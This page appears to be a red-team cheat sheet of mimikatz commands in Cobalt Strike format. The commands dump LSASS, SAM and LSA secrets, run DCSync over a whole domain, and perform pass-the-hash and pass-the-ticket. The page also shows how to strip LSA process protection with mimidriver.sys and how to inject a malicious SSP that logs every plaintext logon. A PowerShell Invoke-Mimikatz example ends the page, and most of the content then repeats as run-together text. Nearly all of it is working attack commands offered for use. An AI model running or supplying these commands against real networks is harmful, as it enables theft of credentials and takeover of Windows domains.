mimikatz

#The commands are in cobalt strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#Dump old passwords and NTLM hashes of a user
mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list

❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?

LSA as a Protected Process (Kernel Land Bypass)

#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa

#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
#Now lets import the mimidriver.sys to the system
mimikatz # !+

#Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove

#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords

LSA as a Protected Process (Userland "Fileless" Bypass)
LSA is running as virtualized process (LSAISO) by Credential Guard

    #Check if a process called lsaiso.exe exists on the running processes
    tasklist |findstr lsaiso
    
    #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
    #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
    mimikatz # misc::memssp
    
    #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
    ```
    
- [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821)
- [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a)

## Mimikatz powershell

```powershell
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'

Previoussqlmap NextmSFVenom Cheatsheet

Last updated 1 day ago

#The commands are in cobalt strike format! #Dump LSASS: mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords #(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN> #List all available kerberos tickets in memory mimikatz sekurlsa::tickets #Dump local Terminal Services credentials mimikatz sekurlsa::tspkg #Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp #List cached MasterKeys mimikatz sekurlsa::dpapi #List local Kerberos AES Keys mimikatz sekurlsa::ekeys #Dump SAM Database mimikatz lsadump::sam #Dump SECRETS Database mimikatz lsadump::secrets #Inject and dump the Domain Controler's Credentials mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject #Dump the Domain's Credentials without touching DC's LSASS and also remotely mimikatz lsadump::dcsync /domain:<DomainFQDN> /all #Dump old passwords and NTLM hashes of a user mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history #List and Dump local kerberos credentials mimikatz kerberos::list /dump #Pass The Ticket mimikatz kerberos::ptt <PathToKirbiFile> #List TS/RDP sessions mimikatz ts::sessions #List Vault credentials mimikatz vault::list

#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1 reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe #Now lets import the mimidriver.sys to the system mimikatz # !+ #Now lets remove the protection flags from lsass.exe process mimikatz # !processprotect /process:lsass.exe /remove #Finally run the logonpasswords function to dump lsass mimikatz # sekurlsa::logonpasswords

#Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides mimikatz # misc::memssp #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log ``` - [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821) - [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a) ## Mimikatz powershell ```powershell PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1 PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'